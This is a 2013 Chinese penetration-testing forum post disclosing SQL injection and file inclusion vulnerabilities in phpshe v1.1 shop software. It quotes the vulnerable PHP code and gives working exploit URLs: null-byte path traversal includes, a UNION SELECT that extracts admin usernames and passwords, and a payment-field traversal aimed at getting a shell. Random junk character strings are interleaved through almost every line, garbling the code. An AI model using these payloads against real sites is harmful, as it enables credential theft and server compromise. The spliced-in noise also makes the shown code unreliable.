找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2635|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/3 n; Y- O, X- k9 v& E2 l
/* Phpshe v1.1 Vulnerability1 l( C/ k9 C7 u8 Q/ v/ |
/* ========================
4 t0 Q, S- H% [$ I- S/* By: : Kn1f3
, S& K9 E! u  M: G8 |# L/* E-Mail : 681796@qq.com
) h- X" U5 X% N0 ^/*******************************************************/6 Y8 X2 f  Z) z3 `, W+ N9 i
0×00 整体大概参数传输: D2 J) e6 N6 ^& Q8 j9 T
6 F. x, `$ y) g" S
$ v' n3 w& U# Q! w& k
) J# |2 l# t3 O1 L6 P0 J
//common.php- p9 A+ H* j! f' |
if (get_magic_quotes_gpc()) {
( ~. h: h0 Q. b2 a. c# ?3 w) P( ]!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
$ [6 r# j% Q+ `8 C4 f  h: f!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');  [4 Z( v' Z5 R- z$ y$ u& A
}) N; k. C! z9 D1 o9 r/ z4 S
else {) w0 B) T! l1 K+ b
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
5 ^. E! E8 b" n( ]; e# d* @!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
* B# [% _$ g6 c' ?2 e6 H. L}
3 F. k( ~0 o# c. E1 W- p( i* Fsession_start();! T7 e/ }5 n: H. _& \( F% R, n
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
+ K& z( R& }6 _/ J  M" k!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');* A" r7 P3 |7 v4 Y
8 U1 g5 ?# B3 [
0×01 包含漏洞
9 O, o+ {% ]( [- M2 |; {6 B  D3 s . [( F* m2 }" e0 @/ V- b4 M

9 L" X1 d6 s/ f6 M. @//首页文件
3 C) Z' q& R3 `" t) r1 X<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
3 @& J3 r1 a0 R2 \* sinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
/ M2 A% C) Q" T' Lpe_result();6 @8 h7 j% y/ G2 _- o5 V
?>
8 p+ Y& {, f  u4 T* l9 N4 \/ K//common 文件 第15行开始
7 {6 b0 L9 `' V% c  yurl路由配置
( f4 `; w2 Z. ?$ f$module = $mod = $act = 'index';
1 J, S5 y4 f' x0 ^; i1 F$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
* f; _9 |. _7 V4 z/ w. Q* T2 V$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);* ~) A" _* n; @8 y
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);& n4 {$ \3 I2 ^- O  X7 I
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
: `& ~4 t- i! s- a, z5 J$ i! u  s


* Z6 f+ O. O# O3 ~0 a- Z( M6 g # Z$ R- t3 R6 b* X) \+ |
0×02 搜索注入2 `2 ?" \, A( b+ w

2 c% K8 q) ]: l( n7 }<code id="code2">

//product.php文件( j) `7 H+ C* u2 y
case 'list':7 }9 G" M5 J# v# U( M
$category_id = intval($id);+ A: Y$ U* g$ G' F4 F
$info = $db->pe_select('category', array('category_id'=>$category_id));
9 [1 Q" ~) I& H. H% s//搜索+ P# v8 @  Z' E
$sqlwhere = " and `product_state` = 1";7 H+ L) j$ C; J
pe_lead('hook/category.hook.php');
; f, e$ h" j+ f2 D" tif ($category_id) {: x( _. @- Y6 w  V' a, \
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";: r5 R, i) n  M: P! C( `" n4 ~9 K
}' e: L3 t' u* s+ g0 ^/ v
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
0 T' F$ ]4 s3 I, F+ lif ($_g_orderby) {
8 C( r, _& A( P- O0 u$orderby = explode('_', $_g_orderby);
9 U. I1 l6 x1 G/ H6 p$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";% e" y7 [( y% e. N5 F$ u0 l
}6 W. h- e9 n- I4 b
else {5 t# L, Z7 |0 N
$sqlwhere .= " order by `product_id` desc";9 R6 u0 V  A1 W" I( d0 W
}3 P: |5 ^: {4 u3 G2 X
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
6 z. b1 @0 X9 x& O//热卖排行
" U% d8 s; T: L2 O$product_hotlist = product_hotlist();
# }9 G/ K% O5 g1 u3 }: e% a//当前路径
9 t0 S1 w0 A5 r8 S% {; l4 ]$nowpath = category_path($category_id);
0 w. }: J5 }/ l0 X4 h7 N$seo = pe_seo($info['category_name']);7 J% K8 N% h, |8 _7 Z  U( r
include(pe_tpl('product_list.html'));4 Z' Q' c% ]* z( d/ `
//跟进selectall函数库6 ^* Z% x: c, ~9 j! E- w
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
7 g7 ~0 |  b% P9 I8 y7 V{( k0 G$ a1 v; |# f1 P3 g, G3 i
//处理条件语句
" G+ S6 E  B6 D" s2 T$sqlwhere = $this->_dowhere($where);8 m# Q$ u" _: h  b3 b. l- E
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);4 A7 Z4 P% c6 R! q  {' B
}
+ K. x. u  c6 l//exp
4 V+ H+ m* v4 R; p, \% v0 G0 Pproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1+ V. c# Y: Y  [; f

</code>, m8 D; b, N) O
$ l. c! {' a3 U
0×03 包含漏洞20 J: t+ |% k$ o$ n5 }" B( }

+ a2 M4 q) p. N% u2 G) n, ?0 Q$ Y<code id="code3">

//order.php

case 'pay':


- I  ~% ^3 a: `1 F1 s0 w$order_id = pe_dbhold($_g_id);

9 l% L: v8 ?; ]4 L
$cache_payway = cache::get('payway');


+ N' H6 I7 Q2 w. w5 Cforeach($cache_payway as $k => $v) {

3 ]9 |, ~+ F. _
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

; V- V5 a: H7 {" i( p& V, Z* j: N+ L1 F
if ($k == 'bank') {

9 x4 z3 X- z3 u1 D$ i8 i/ [- N# N
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

+ ]( }- E1 V, A, L/ _, S  ]0 z. n
}


$ U" k! f& q% Q* R}


' ?- u0 a7 g9 I! Q$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

7 j) S* P# m, P/ e* T
!$order['order_id'] && pe_error('订单号错误...');


- o% `9 g5 @/ R* i9 P' R6 |$ R$ i: W) }if (isset($_p_pesubmit)) {

# k% @' K' l/ v( O' X& j
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


! v5 |# b* i1 W; u, ~7 {7 D8 ?$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

7 v5 `. ?! ]' O6 Y! j/ Z0 E5 G
foreach ($info_list as $v) {


: n! ~; P0 C9 q' W$order['order_name'] .= "{$v['product_name']};";
3 a; T- \$ Z7 K


9 f3 U$ |# N' ~: q( W}


6 i( X- [$ Y, O) R; c( A! K0 a! `. `echo '正在为您连接支付网站,请稍后...';

$ K; q" d, `$ _  H! Q; M
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

3 |& z" U0 R& y6 |
}//当一切准备好的时候就可以进行"鸡肋包含了"

+ ~, S( F" y# X' q, z
else {

6 O4 b- X* F4 \! @3 ^& R4 y; q: d
pe_error('支付错误...');


2 a4 ^' v- p) b# Y}


8 I1 x; Y; E( D8 u, \}


* E) K3 {( O' A8 N$seo = pe_seo('选择支付方式');

! F/ N& A3 j0 N" h: Y6 z/ W
include(pe_tpl('order_pay.html'));

+ j0 {& z: T6 ?
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
- P  U' n9 x8 y- Shttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表